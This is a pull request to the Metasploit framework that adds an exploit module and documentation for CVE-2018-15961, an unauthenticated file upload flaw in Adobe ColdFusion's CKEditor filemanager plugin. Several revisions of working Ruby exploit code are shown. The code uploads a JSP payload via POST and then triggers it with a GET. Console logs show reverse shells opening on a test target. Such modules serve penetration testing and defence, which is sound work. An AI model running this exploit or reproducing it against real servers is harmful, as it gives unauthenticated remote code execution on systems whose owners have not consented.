### PR TITLE
Coldfusion ckeditor file upload

### DIFF
--- a/documentation/modules/exploit/multi/http/coldfusion_ckeditor_file_upload.md
+++ b/documentation/modules/exploit/multi/http/coldfusion_ckeditor_file_upload.md
@@ -12,7 +12,6 @@ ColdFusion 11 (Update 14 and earlier),
 ColdFusion 2016 (Update 6 and earlier), and 
 [ColdFusion 2018 (July 12 release)](https://bintray.com/eaps/coldfusion/cf%3Acoldfusion/2018.0.0)
 
-
 ## Verification Steps
 
 1. `./msfconsole -q`
@@ -22,13 +21,11 @@ ColdFusion 2016 (Update 6 and earlier), and
 5. `exploit`
 6. Get a shell
 
-
 ## Scenarios
 
 ### Tested on Coldfusion 2018 v2018.0.0.310739
 
 ```
-
 msf5 > use exploit/multi/http/coldfusion_ckeditor_file_upload
 msf5 exploit(multi/http/coldfusion_ckeditor_file_upload) > set rhosts 172.22.222.142
 rhosts => 172.22.222.142

--- a/documentation/modules/exploit/multi/http/coldfusion_ckeditor_file_upload.md
+++ b/documentation/modules/exploit/multi/http/coldfusion_ckeditor_file_upload.md
@@ -1,0 +1,51 @@
+## Description
+
+A file upload vulnerability in the CKEditor of Adobe ColdFusion 11 
+(Update 14 and earlier), ColdFusion 2016 (Update 6 and earlier), and 
+ColdFusion 2018 (July 12 release) allows unauthenticated remote 
+attackers to upload and execute JSP files through the filemanager 
+plugin. Tested on Adobe ColdFusion 2018 v2018.0.0.310739.
+
+## Vulnerable Application
+
+ColdFusion 11 (Update 14 and earlier),
+ColdFusion 2016 (Update 6 and earlier), and 
+[ColdFusion 2018 (July 12 release)](https://bintray.com/eaps/coldfusion/cf%3Acoldfusion/2018.0.0)
+
+
+## Verification Steps
+
+1. `./msfconsole -q`
+2. `use exploit/multi/http/coldfusion_ckeditor_file_upload`
+3. `set rhosts <rhost>`
+4. `set lhost <lhost>`
+5. `exploit`
+6. Get a shell
+
+
+## Scenarios
+
+### Tested on Coldfusion 2018 v2018.0.0.310739
+
+```
+
+msf5 > use exploit/multi/http/coldfusion_ckeditor_file_upload
+msf5 exploit(multi/http/coldfusion_ckeditor_file_upload) > set rhosts 172.22.222.142
+rhosts => 172.22.222.142
+msf5 exploit(multi/http/coldfusion_ckeditor_file_upload) > set lhost 172.22.222.136 
+lhost => 172.22.222.136
+msf5 exploit(multi/http/coldfusion_ckeditor_file_upload) > exploit
+
+[*] Started reverse TCP handler on 172.22.222.136:4444 
+[*] Uploading the JSP payload at /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/ASMK.jsp...
+[+] Upload succeeded! Executing payload...
+[*] Command shell session 1 opened (172.22.222.136:4444 -> 172.22.222.142:43262) at 2019-01-10 06:30:52 -0600
+
+whoami
+cfuser
+uname -a
+Linux 6bd4238e7ffb 4.15.0-38-generic #41-Ubuntu SMP Wed Oct 10 10:59:38 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
+exit
+[*] 172.22.222.142 - Command shell session 1 closed.
+msf5 exploit(multi/http/coldfusion_ckeditor_file_upload) >
+```

--- a/modules/exploits/multi/http/coldfusion_ckeditor_file_upload.rb
+++ b/modules/exploits/multi/http/coldfusion_ckeditor_file_upload.rb
@@ -65,15 +65,14 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options(
       [
-        OptString.new('CKEDITOR_DIR', [ false, 'The CKEditor path', '/cf_scripts/scripts/ajax/ckeditor' ]),
+        OptString.new('TARGETURI', [ false, 'The CKEditor path', '/cf_scripts/scripts/ajax/ckeditor' ]),
       ])
   end
 
   def exploit
+    filename = rand_text_alpha_upper(1..10) + '.jsp'
 
-    filename = rand_text_alpha_upper(rand(10) + 1) + ".jsp"
-
-    print_status("Uploading the JSP payload at #{datastore['CKEDITOR_DIR']}/plugins/filemanager/uploadedFiles/#{filename}...")
+    print_status("Uploading the JSP payload at #{datastore['TARGETURI']}/plugins/filemanager/uploadedFiles/#{filename}...")
 
     mime = Rex::MIME::Message.new
     mime.add_part(payload.encoded, "application/octet-stream", nil, "form-data; name=\"file\"; filename=\"#{filename}\"")
@@ -84,26 +83,24 @@ class MetasploitModule < Msf::Exploit::Remote
 
     res = send_request_cgi(
       {
-        'uri'		=> normalize_uri(datastore['CKEDITOR_DIR'], "plugins", "filemanager", "upload.cfm"),
+        'uri'		=> normalize_uri(datastore['TARGETURI'], "plugins", "filemanager", "upload.cfm"),
         'version'	=> '1.1',
         'method'	=> 'POST',
         'ctype'		=> 'multipart/form-data; boundary=' + mime.bound,
         'data'		=> post_str,
       })
 
-    if (res and res.code == 200)
-      print_good("Upload succeeded! Executing payload...")
-
-      send_request_raw(
-        {
-          'uri'		=> "#{datastore['CKEDITOR_DIR']}/plugins/filemanager/uploadedFiles/#{filename}",
-          'method'	=> 'GET',
-        }, 5)
-
-      handler
-    else
-      print_error("Upload Failed...")
-      return
+    unless (res && res.code == 200)
+      fail_with Failure::Unknown, 'Upload Failed...'
     end
+
+    print_good("Upload succeeded! Executing payload...")
+
+    send_request_cgi(
+      {
+        'uri'    => "#{datastore['TARGETURI']}/plugins/filemanager/uploadedFiles/#{filename}",
+        'method' => 'GET'
+      }, 5)
+ 
   end
 end

--- a/modules/exploits/multi/http/coldfusion_ckeditor_file_upload.rb
+++ b/modules/exploits/multi/http/coldfusion_ckeditor_file_upload.rb
@@ -30,6 +30,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'References'      =>
         [
           [ "CVE", "2018-15961" ],
+          [ "BID", "105314" ],
           [ "URL", "https://helpx.adobe.com/fr/security/products/coldfusion/apsb18-33.html" ]
         ],
       'Privileged'      => false,
@@ -59,7 +60,7 @@ class MetasploitModule < Msf::Exploit::Remote
           ],
         ],
       'DefaultTarget'   => 0,
-      'DisclosureDate'  => '11 septembre 2018'
+      'DisclosureDate'  => 'Sep 11 2018'
     ))
 
     register_options(

--- a/modules/exploits/multi/http/coldfusion_ckeditor_file_upload.rb
+++ b/modules/exploits/multi/http/coldfusion_ckeditor_file_upload.rb
@@ -18,89 +18,76 @@ class MetasploitModule < Msf::Exploit::Remote
         ColdFusion 2018 (July 12 release) allows unauthenticated remote
         attackers to upload and execute JSP files through the filemanager
         plugin.
-        Tested on Adobe ColdFusion 2018.
+        Tested on Adobe ColdFusion 2018.0.0.310739.
       },
       'Author'          =>
         [
-          'Pete Freitag de Foundeo', # Vulnerability discovery
-          'Vahagn vah_13 Vardanian', # First public PoC
-          'Qazeer' # Metasploit module
+          'Pete Freitag de Foundeo',  # Vulnerability discovery
+          'Vahagn vah_13 Vardanian',  # First public PoC
+          'Qazeer'                    # Metasploit module
         ],
       'License'         => MSF_LICENSE,
       'References'      =>
         [
-          [ "CVE", "2018-15961" ],
-          [ "BID", "105314" ],
-          [ "URL", "https://helpx.adobe.com/fr/security/products/coldfusion/apsb18-33.html" ]
+          [ 'CVE', '2018-15961' ],
+          [ 'BID', '105314' ],
+          [ 'URL', 'https://helpx.adobe.com/fr/security/products/coldfusion/apsb18-33.html' ]
         ],
       'Privileged'      => false,
-      'Stance'          => Msf::Exploit::Stance::Aggressive,
-      'Platform'        => ['win', 'linux'],
-      'Targets'        =>
+      'Platform'        => %w{ linux win },
+      'Arch'            => ARCH_JAVA,
+      'Targets'         =>
         [
-          [ 'Universal Linux Target',
+          [ 'Java Universal',
             {
               'Arch'     => ARCH_JAVA,
-              'Platform' => 'linux',
-              'Payload'  =>
-                {
-                  'DisableNops' => true,
-                },
+              'Platform' => %w{ linux win },
+              'Payload'  => { 'DisableNops' => true },
+              'DefaultOptions' => {'PAYLOAD' => 'java/jsp_shell_reverse_tcp'}
             }
-          ],
-          [ 'Universal Windows Target',
-            {
-              'Arch'     => ARCH_JAVA,
-              'Platform' => 'win',
-              'Payload'  =>
-                {
-                  'DisableNops' => true,
-                },
-            }
-          ],
+          ]
         ],
       'DefaultTarget'   => 0,
+      'DefaultOptions'  => { 'RPORT' => 8500 },
       'DisclosureDate'  => 'Sep 11 2018'
     ))
 
-    register_options(
-      [
-        OptString.new('TARGETURI', [ false, 'The CKEditor path', '/cf_scripts/scripts/ajax/ckeditor' ]),
-      ])
+    register_options [
+      OptString.new('TARGETURI', [ false, 'Base application path', '/' ]),
+    ]
   end
 
   def exploit
     filename = rand_text_alpha_upper(1..10) + '.jsp'
 
-    print_status("Uploading the JSP payload at #{datastore['TARGETURI']}/plugins/filemanager/uploadedFiles/#{filename}...")
+    print_status("Uploading the JSP payload at #{target_uri}cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/#{filename}...")
 
     mime = Rex::MIME::Message.new
-    mime.add_part(payload.encoded, "application/octet-stream", nil, "form-data; name=\"file\"; filename=\"#{filename}\"")
-    mime.add_part("path", "text/plain", nil, "form-data; name=\"path\"")
+    mime.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"file\"; filename=\"#{filename}\"")
+    mime.add_part('path', 'text/plain', nil, 'form-data; name="path"')
 
     post_str = mime.to_s
     post_str.strip!
 
-    res = send_request_cgi(
-      {
-        'uri'		=> normalize_uri(datastore['TARGETURI'], "plugins", "filemanager", "upload.cfm"),
-        'version'	=> '1.1',
-        'method'	=> 'POST',
-        'ctype'		=> 'multipart/form-data; boundary=' + mime.bound,
-        'data'		=> post_str,
-      })
+    res = send_request_cgi({
+      'uri'     => normalize_uri(target_uri, 'cf_scripts','scripts','ajax','ckeditor','plugins','filemanager','upload.cfm'),
+      'version' => '1.1',
+      'method'  => 'POST',
+      'ctype'   => 'multipart/form-data; boundary=' + mime.bound,
+      'data'    => post_str,
+    })
 
-    unless (res && res.code == 200)
+    unless res && res.code == 200
       fail_with Failure::Unknown, 'Upload Failed...'
     end
 
-    print_good("Upload succeeded! Executing payload...")
+    print_good('Upload succeeded! Executing payload...')
 
-    send_request_cgi(
-      {
-        'uri'    => "#{datastore['TARGETURI']}/plugins/filemanager/uploadedFiles/#{filename}",
-        'method' => 'GET'
-      }, 5)
- 
+    send_request_cgi({
+      'uri'     => normalize_uri(target_uri, 'cf_scripts', 'scripts', 'ajax',
+                    'ckeditor', 'plugins', 'filemanager', 'uploadedFiles', filename),
+      'method' => 'GET'
+    }, 5)
+
   end
 end

--- a/modules/exploits/multi/http/coldfusion_ckeditor_file_upload.rb
+++ b/modules/exploits/multi/http/coldfusion_ckeditor_file_upload.rb
@@ -1,0 +1,108 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  include Msf::Exploit::Remote::HttpClient
+
+  Rank = ExcellentRanking
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'            => 'Adobe ColdFusion CKEditor unrestricted file upload',
+      'Description'     => %q{
+        A file upload vulnerability in the CKEditor of Adobe ColdFusion 11
+        (Update 14 and earlier), ColdFusion 2016 (Update 6 and earlier), and
+        ColdFusion 2018 (July 12 release) allows unauthenticated remote
+        attackers to upload and execute JSP files through the filemanager
+        plugin.
+        Tested on Adobe ColdFusion 2018.
+      },
+      'Author'          =>
+        [
+          'Pete Freitag de Foundeo', # Vulnerability discovery
+          'Vahagn vah_13 Vardanian', # First public PoC
+          'Qazeer' # Metasploit module
+        ],
+      'License'         => MSF_LICENSE,
+      'References'      =>
+        [
+          [ "CVE", "2018-15961" ],
+          [ "URL", "https://helpx.adobe.com/fr/security/products/coldfusion/apsb18-33.html" ]
+        ],
+      'Privileged'      => false,
+      'Stance'          => Msf::Exploit::Stance::Aggressive,
+      'Platform'        => ['win', 'linux'],
+      'Targets'        =>
+        [
+          [ 'Universal Linux Target',
+            {
+              'Arch'     => ARCH_JAVA,
+              'Platform' => 'linux',
+              'Payload'  =>
+                {
+                  'DisableNops' => true,
+                },
+            }
+          ],
+          [ 'Universal Windows Target',
+            {
+              'Arch'     => ARCH_JAVA,
+              'Platform' => 'win',
+              'Payload'  =>
+                {
+                  'DisableNops' => true,
+                },
+            }
+          ],
+        ],
+      'DefaultTarget'   => 0,
+      'DisclosureDate'  => '11 septembre 2018'
+    ))
+
+    register_options(
+      [
+        OptString.new('CKEDITOR_DIR', [ false, 'The CKEditor path', '/cf_scripts/scripts/ajax/ckeditor' ]),
+      ])
+  end
+
+  def exploit
+
+    filename = rand_text_alpha_upper(rand(10) + 1) + ".jsp"
+
+    print_status("Uploading the JSP payload at #{datastore['CKEDITOR_DIR']}/plugins/filemanager/uploadedFiles/#{filename}...")
+
+    mime = Rex::MIME::Message.new
+    mime.add_part(payload.encoded, "application/octet-stream", nil, "form-data; name=\"file\"; filename=\"#{filename}\"")
+    mime.add_part("path", "text/plain", nil, "form-data; name=\"path\"")
+
+    post_str = mime.to_s
+    post_str.strip!
+
+    res = send_request_cgi(
+      {
+        'uri'		=> normalize_uri(datastore['CKEDITOR_DIR'], "plugins", "filemanager", "upload.cfm"),
+        'version'	=> '1.1',
+        'method'	=> 'POST',
+        'ctype'		=> 'multipart/form-data; boundary=' + mime.bound,
+        'data'		=> post_str,
+      })
+
+    if (res and res.code == 200)
+      print_good("Upload succeeded! Executing payload...")
+
+      send_request_raw(
+        {
+          'uri'		=> "#{datastore['CKEDITOR_DIR']}/plugins/filemanager/uploadedFiles/#{filename}",
+          'method'	=> 'GET',
+        }, 5)
+
+      handler
+    else
+      print_error("Upload Failed...")
+      return
+    end
+  end
+end


### PR DESCRIPTION
**New pull request from an unique branch (coldfusion_ckeditor_file_upload) as requested.
Integrates RootUp and bcoles' comments from the previous pull request.**

--
Hello everyone,

This module exploit the unrestricted file upload flaw in the Adobe ColdFusion CKEditor, affecting ColdFusion 11 (Update 14 and earlier), ColdFusion 2016 (Update 6 and earlier), and ColdFusion 2018 (July 12 release). The vulnerabilty goes by CVE-2018-15961.

The exploitation is pretty basic, a JSP payload is uploaded through a single unauthenticated POST request and executed through a following unauthenticated GET request.

This module was successfully tested against a Linux Adobe ColdFusion 2018 installation using the docker container provided by Adobe (https://bintray.com/eaps/coldfusion/cf%3Acoldfusion/2018.0.0).

### Output
msf > use exploit/multi/http/coldfusion_ckeditor_file_upload
msf exploit(multi/http/coldfusion_ckeditor_file_upload) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf exploit(multi/http/coldfusion_ckeditor_file_upload) > set RPORT 8500
RPORT => 8500
msf exploit(multi/http/coldfusion_ckeditor_file_upload) > set payload java/jsp_shell_reverse_tcp
payload => java/jsp_shell_reverse_tcp
msf exploit(multi/http/coldfusion_ckeditor_file_upload) > set LHOST 172.17.0.1
LHOST => 172.17.0.1
msf exploit(multi/http/coldfusion_ckeditor_file_upload) > run

[] Started reverse TCP handler on 172.17.0.1:4444
[] Uploading the JSP payload at /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/LKDZNMPN.jsp...
[+] Upload succeeded! Executing payload...
[*] Command shell session 1 opened (172.17.0.1:4444 -> 172.17.0.2:38568) at 2019-01-06 05:07:54 +0100

whoami
cfuser

### Verification
msfconsole
use exploit/multi/http/coldfusion_ckeditor_file_upload set srvhost
set RHOST
set RPORT
// If necessary
set payload
set LHOST
set LPORT
run

### TODO
Should be working on Windows and Adobe 2016 as the URL used do not change but not tested.